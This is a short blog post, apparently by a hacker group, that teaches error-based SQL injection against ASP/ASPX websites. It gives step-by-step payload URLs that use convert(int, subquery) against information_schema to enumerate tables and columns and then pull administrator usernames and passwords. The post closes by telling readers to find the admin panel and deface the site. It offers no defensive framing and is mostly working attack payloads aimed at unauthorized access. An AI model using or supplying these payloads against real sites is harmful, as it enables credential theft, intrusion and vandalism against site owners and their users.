Hello!
This Time I am Posting About ASPX Injection.
Now lets start.
====================================================================================================================
ASPX injection is also similar to PHP based
SQL
injection.But here, we don't use queries that
contain order by, union
select etc. Instead, we will cheat the server to
respond with the
information we needed. It is an error based
injection technique . We will get the
information in the form of errors.
=============================
Step 1:
Find Out A Vulnerable Link
First, we need find out a vulnerable asp/aspx
link which looks like that
www.vulnerablesite.com/gallery.aspx?id=10
=============================
Step 2:
Checking For Vulnerability
As in the PHP based injection, we will test for
the vulnerability by adding a single quote(') at
the end of the URL.
www.vulnerablesite.com/gallery.aspx?id=10'
If it gives an error
then your site is vulnerable to asp/aspx injection.
In asp/aspx based injections, we need not find
out the number of columns
or the most vulnerable column. We will
directly find out the table
names,column names and then we will extract
the data.
=============================
Step 3:
Finding Out The Table Names.
www.vulnerablesite.com/gallery.aspx?id=10
and 1=convert(int,(select top 1 table_name
from information_schema.tables))
The above code executes the second query and
retrieves the first table
name from the database. the windows server
cant convert character
value into data type. so we will get an error from which we can get the first table
name.
But this may not be the desired table for us.
So we need to find out the next table name in
the database.
For that, we will use the following query.
www.vulnerablesite.com/gallery.aspx?id=10
and
1=convert(int,(select top1 table_name from
information_schema.tables
where table_name not in ('first_table_name')))
Replace the first_table_name with the actual
table name we got above.
Now we will get the second table name.
Still if
You don't get our desired table,you will
continue the procedure until you
get the desired table name. Now the query
looks like that
www.vulnerablesite.com/gallery.aspx?id=10
and
1=convert(int,(select top1 table_name from
information_schema.tables
where table_name not in
('first_table_name','second_table_name')))
Replace first_table_name and
second_table_name with the table names we
got in the above steps.
=============================
Step 4:
Finding Out The Columns
Now we got the admin table. So we need to
find out the columns now.
www.vulnerablesite.com/gallery.aspx?id=10
and 1=convert(int,(select top1 column_name
from information_schema.columns where
table_name='admin_table'))
Replace admin_table with the table name we
got. In my case, it is "vw_system_admin"
If the first column is not related to our desired
column names, then follow the steps as we
have done in step 3.
www.vulnerablesite.com/gallery.aspx?id=10
and 1=convert(int,(select top1 column_name
from
information_schema.columns where
table_name='admin_table' and
column_name not in ('first_column_name')))
Replace first_column_name with the column
name we got.
=============================
Step 5:
Extracting The Data
After finding out all the columns, we need to
extract the data such as user names and
passwords.
For that, we use the following query
For user name:-
www.vulnerablesite.com/gallery.aspx?id=10
and 1=convert(int,(select top 1
admin_username from admin_table))
For password:-
www.vulnerablesite.com/gallery.aspx?id=10
and 1=convert(int,(select top 1
admin_password from admin_table))
Now Find Admin Panel.
& Deface It.
#Anonymous_Knw
0 comments:
Post a Comment